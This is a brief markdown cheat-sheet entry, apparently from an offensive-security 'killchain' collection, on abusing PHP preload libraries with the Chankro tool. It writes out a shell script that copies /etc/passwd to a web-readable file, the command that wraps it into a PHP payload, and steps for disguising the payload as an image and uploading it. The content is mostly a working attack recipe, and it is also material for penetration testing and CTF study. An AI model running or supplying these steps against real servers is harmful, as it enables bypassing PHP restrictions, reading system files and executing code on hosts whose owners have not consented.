killchain-compendium/Exploits/Web/PHP Preload Libs.md

449 B

Preload Library

Usage

  • Create lib, find path via <URL>/phpinfo.php
echo "#!/usr/bin/env bash" > rev.sh
echo "cat /etc/passwd > <basepath>/output.txt" >> rev.sh

python2 ./chankro.py --arch 64 --input rev.sh --output chan.php --path <basepath>
  • Put into image file via exiftool or write magic header
  • Upload